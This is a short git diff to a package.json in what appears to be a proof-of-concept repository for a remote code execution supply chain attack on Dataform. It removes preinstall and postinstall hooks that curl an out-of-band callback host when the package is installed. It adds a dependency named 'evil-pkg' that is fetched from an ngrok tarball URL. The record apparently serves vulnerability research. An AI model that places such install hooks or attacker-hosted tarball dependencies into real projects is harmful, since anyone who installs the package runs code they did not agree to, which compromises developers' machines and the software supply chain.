Add evil package supply chain attack PoC

--- a/package.json
+++ b/package.json
@@ -1,12 +1,9 @@
 {
   "name": "dataform-vuln-poc",
   "version": "1.0.0",
-  "description": "Dataform vulnerability PoC - npm registry tests",
+  "description": "Dataform RCE PoC - supply chain attack via tarball URL",
   "dependencies": {
-    "@dataform/core": "^2.9.0"
-  },
-  "scripts": {
-    "postinstall": "curl -s https://juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun/npm-postinstall-script",
-    "preinstall": "curl -s https://juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun/npm-preinstall-script"
+    "@dataform/core": "^2.9.0",
+    "evil-pkg": "https://b085ce372309.ngrok-free.app/evil-package.tgz"
   }
 }
